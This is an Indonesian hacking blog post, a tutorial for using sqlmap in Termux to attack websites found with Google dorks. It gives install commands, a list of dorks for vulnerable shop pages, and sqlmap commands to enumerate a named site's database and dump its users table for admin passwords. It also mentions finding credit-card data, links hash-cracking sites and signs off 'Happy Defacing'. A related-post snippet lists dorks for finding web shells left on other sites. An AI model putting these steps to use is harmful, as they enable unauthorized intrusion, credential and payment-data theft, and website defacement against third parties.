Langsung ke konten utama

SQL injection Using SQLMap Via Termux


Assalamualaikum.

 Ketemu lagi dengan aku selaku admin.
pada tutorial kali ini admin mau sharing tutorial  SQL injection menggunakan sqlmap di termux.

Oke simak baik-baik ya,

Bahan yg harus kalian punya : 
• Termux (silahkan download dulu di playstore)
• Web vuln sqli injection
• Jaringan yg lancar
• Kesabaran tentunya,dan
• Segelas semangat untuk memulai semuanya :)

Step by step :
• Install dulu termux nya 
• kalo udah ,ketik langkah nya dibawah ini

$ apt update -y && apt upgrade -y
$ pkg install nano -y
$ pkg install git -y
$ pkg install python -y
$ pkg install python2 -y 

Lalu install SQLMap nya 

$ git clone https://github.com/sqlmapproject/sqlmap.git
$ cd sqlmap
$ python2 sqlmap.py

Jika sudah terinstall semua lalu masukan dork dibawah ini di web browser kalian : 

Dork : 
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=

Terserah mau pilih yang mana ,disini admin udah ada web target jadi langsung eksekusi 
Ketik perintah : 



Kan keliatan tuh database web nya,pilih salah satu,disini aku pilih :

soccerfi_webdb

Kemudian untuk melihat table nya kita
ketik perintah :


python sqlmap.py -u "https://sitetarget.com/pages.php?id=2" --tables -D soccerfi_webdb






 Kan ada banyak tuh table yg muncul,pilih salah satu aja,berhubung tujuan kita untuk deface kita harus nyari username & password.
 Cari table yg berhubungan dengan username & password

Contoh :
• users
• admin,dll

Jika kalian beruntung ,kalian juga bisa  menemukan cc/credit card.

 Oke selanjutnya untuk melihat isi dari column kita ketik perintah :

python sqlmap.py -u "https://sitetarget.com/pages.php?id=2" --columns -D soccerfi_webdb -T users --columns



 Kemudian,untuk melihat isi dari username & password di atas
ketik perintah :

python sqlmap.py -u "https://socc/pages.php?id=2" --columns -D soccerfi_webdb -T users --dump







Dan taraaa...kita sudah mendapatkan username dan password admin.
 Disini aku beruntung karna password nya tidak terenkriprsi ,jika kalian mendapatkan password yg terenkripsi maka harus hash terlebih dahulu,bisa di

https://hashkiller.co.uk atau di
https://www.md5online.org



Jika password sudah ter hash , langkah selanjutnya tinggal mencari halaman admin login.


Mungkin cukup sampai disini ya,sampai ketemu di tutorial selanjutnya.

Jika masih kurang paham,bisa bertanya melalui fanspage kami di facebook :
https://m.facebook.com/sorong6etar/

Terima kasih sudah berkunjung,sampai jumpa.
Happy Defacing^~^

Komentar

Posting Komentar

Postingan populer dari blog ini

Tutorial deface dorking shell + dork priv8 cantik

   Assalamualaikum. Hola...Ketemu lagi dengan aku,tentunya tersgalanya dung h3h3   K ali ini aku mau share tutorial deface untuk pemula kek aku . Simak yaa..zeyenk . Metode Dorking Shell atau sering disebut Poc Mata Batin ini banyak di pakai para defacer defacer kelahiran 2K18 . Bagi kalian yang suka tikung menikung dan pastinya ga mau ribet lah yah,metode ini pas banget . Okey,Ga perlu panjang lebar jelasin nya l angsung aja. Yang harus kalian punya :   • Pc/hp • Script deface • Wajah agan harus tamvan pastinya ,becanda xD • Koneksi internet • Kesabaran Dork Google : intitle:"IndoXploit" filetype:php intitle:"IndoXploit" intext:"public_html" filetype:php intitle:"IndoXploit" intext:"mass deface" filetype:php Dork Priv8 : intitle:"Priv8 Shell" intext:/var/www/ intitle:"Mini Shell" intext:/vhost/ intitle:"Con7ext" intext:/var/www/ intitle:"Cantik Mini Shell...
Posting Komentar
Baca selengkapnya